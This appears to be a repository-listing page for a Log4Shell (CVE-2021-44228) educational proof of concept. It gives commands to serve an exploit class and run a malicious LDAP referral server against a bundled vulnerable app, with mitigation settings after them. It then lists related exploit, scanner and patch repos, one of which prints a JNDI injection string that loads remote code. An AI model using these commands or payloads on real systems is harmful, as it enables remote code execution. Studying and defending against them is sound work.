CVE-2021-44228 (Log4Shell) Proof of Concept

Last update: Mar 18, 2022

Overview

CVE-2021-44228 (Log4Shell) Proof of Concept

Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.

To help customers understand how this flaw works, we prepared this repo with a simple yet working Proof of Concept.

Prerequisites

Having installed locally:

Git
JDK 11
Maven
Python

At the moment, the arbitrary code launches the Calculator application on macOS or Windows, so only those two operating systems are supported by this PoC.

Disclaimer

All informations and code are provided solely for educational purposes and/or testing your own systems for this vulnerability.

The attack tecnique

This PoC resemble the described in the picture below (credits GovCERT.ch), a part from the vulnerable server that is just a simple Java class for the sake of simplicity. It's important to understand that this vulnerability may be triggered in various ways, what is described below is just one of them.

How to run the PoC

Clone this repo

terminal1 $ git clone https://github.com/sunnyvale-it/CVE-2021-44228-PoC.git

Compile the exploit (using JDK 11)

terminal1 $ javac Exploit.java

Run an HTTP server to serve the exploit

terminal1 $ python -m SimpleHTTPServer 8888 --directory .

Start the malicious LDAPRefServer (thanks to https://github.com/mbechler/marshalsec)

terminal2 $ java -cp tools/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://127.0.0.1:8888/#Exploit"

Launch the buggy application (containing log4j 2.14.1)

terminal3 $ mvn package && mvn exec:exec

If everything went fine, the Calculator application (arbitrary code execution) should pop-up

Quick mitigations (work on Log4J versions 2.10.0 up to 2.14.1)

Set the LOG4J_FORMAT_MSG_NO_LOOKUPS env variable to true

terminal3 $ export LOG4J_FORMAT_MSG_NO_LOOKUPS=true

terminal3 $ mvn package && mvn exec:exec

In this case the Calculator shouldn't pop-up anymore

Run the application with log4j2.formatMsgNoLookups System property set to true

terminal3 $ mvn package && mvn exec:exec -Dlog4j2.formatMsgNoLookups=true

In this case the Calculator shouldn't pop-up anymore

Writeup and exploit for installed app to system privilege escalation on Android 12 Beta through CVE-2021-0928

Writeup and exploit for installed app to system privilege escalation on Android 12 Beta through CVE-2021-0928, a `writeToParcel`/`createFromParcel` serialization mismatch in `OutputConfiguration`

Dec 30, 2022

Huntress Log4Shell Testing Application

Huntress Log4Shell Testing Application This repo holds the source for the HTTP and LDAP servers hosted here. Both services are hosted under one Java a

Nov 25, 2022

Log4Shell RCE exploit using a gadget class. Not dependent on an old JDK version to work.

Jan 4, 2022

Disables JNDI lookup globally using Java agent instrumentation, mitigation for Log4Shell attacks.

NoJNDI This is a simple proof of concept agent that disables JNDI lookups globally across the JVM. This is useful for mitigating the Log4Shell attack,

Dec 29, 2021

Contains all my research and content produced regarding the log4shell vulnerability

Objective Contains all my research and content produced regarding the log4shell vulnerability. Content Folder "analysis" Contain the information that

Oct 28, 2022

A Basic Java Application Vulnerable to the Log4Shell RCE

This is a basic, minimal, intentionally vulnerable Java web application including a version (2.14.1) of the log4j library affected by the infamous log4shell (CVE-2021-44228) vulnerability.

Nov 9, 2022

CVE-2021-44228 (Log4Shell) Proof of Concept

CVE-2021-44228 (Log4Shell) Proof of Concept Apache Log4j2 =2.14.1 JNDI features used in configuration, log messages, and parameters do not protect ag

Mar 18, 2022

This repo contains a proof-of-concept for 📱🚀👑⚡, a deserialization vuln for local escalation of privilege to system_server in Android 10. This proof-of-concept only activates a privileged intent.

CVE-2020-0082-PoC This repo contains a proof-of-concept for 📱 🚀 👑 ⚡ , a deserialization vuln for local escalation of privilege to system_server in

Oct 11, 2022

Log4j-RCE (CVE-2021-44228) Proof of Concept with additional information

Log4J-RCE-Proof-Of-Concept (CVE-2021-44228) This is a proof of concept of the log4j rce. Here are some links for the CVE-2021-44228: https://www.lunas

Dec 2, 2022

Burp Active Scan extension to identify Log4j vulnerabilities CVE-2021-44228 and CVE-2021-45046

Log4j-HammerTime This Burp Suite Active Scanner extension validates exploitation of the Apache Log4j CVE-2021-44228 and CVE-2021-45046 vulnerabilities

Jan 8, 2022

Log4J scanner that detects vulnerable Log4J versions (CVE-2021-44228, CVE-2021-45046, etc) on your file-system within any application. It is able to even find Log4J instances that are hidden several layers deep. Works on Linux, Windows, and Mac, and everywhere else Java runs, too!

Log4-detector Scanner that detects vulnerable Log4J versions to help teams assess their exposure to CVE-2021-44228 (CRITICAL), CVE-2021-45046, CVE-202

Dec 26, 2022

Log4Shell Zero-Day Exploit Proof of Concept

Log4Shell Zero-Day Exploit if attacker manage to log this string ${jndi:ldap://someaddresshere/param1=value1} to log4j it somehow loads the class/java

Oct 9, 2022

Test case to check if the Log4Shell/CVE-2021-44228 hotfix will raise any unexpected exceptions

Log4Shell Hotfix Side Effect Test Case I wanted to know if any ClassNotFoundException or similar unexpected exception is raised when one applies the C

Nov 9, 2022

Log4Shell sample vulnerable application (CVE-2021-44228)

Dec 26, 2021

An LDAP RCE exploit for CVE-2021-44228 Log4Shell

log4j-poc An LDAP RCE exploit for CVE-2021-44228 Log4Shell Description The demo Tomcat 8 server on port 8080 has a vulnerable app (log4shell) deployed

Dec 10, 2022

Spring Boot web application vulnerable to CVE-2021-44228, nicknamed Log4Shell.

Log4Shell sample vulnerable application (CVE-2021-44228) This repository contains a Spring Boot web application vulnerable to CVE-2021-44228, nickname

Jan 5, 2023

PCRE RegEx matching Log4Shell CVE-2021-44228 IOC in your logs

Log4Shell-Rex The following RegEx was written in an attempt to match indicators of a Log4Shell (CVE-2021-44228 and CVE-2021-45046) exploitation. If yo

Nov 9, 2022

A mitigation for CVE-2021-44228 (log4shell) that works by patching the vulnerability at runtime. (Works with any vulnerable java software, tested with java 6 and newer)

Log4jPatcher A Java Agent based mitigation for Log4j2 JNDI exploits. This agent employs 2 patches: Disabling all Lookup conversions (on supported Log4

Dec 16, 2022

A proof-of-concept serverless full-text search solution built with Apache Lucene and Quarkus framework.

Lucene Serverless This project demonstrates a proof-of-concept serverless full-text search solution built with Apache Lucene and Quarkus framework. ✔️

Oct 29, 2022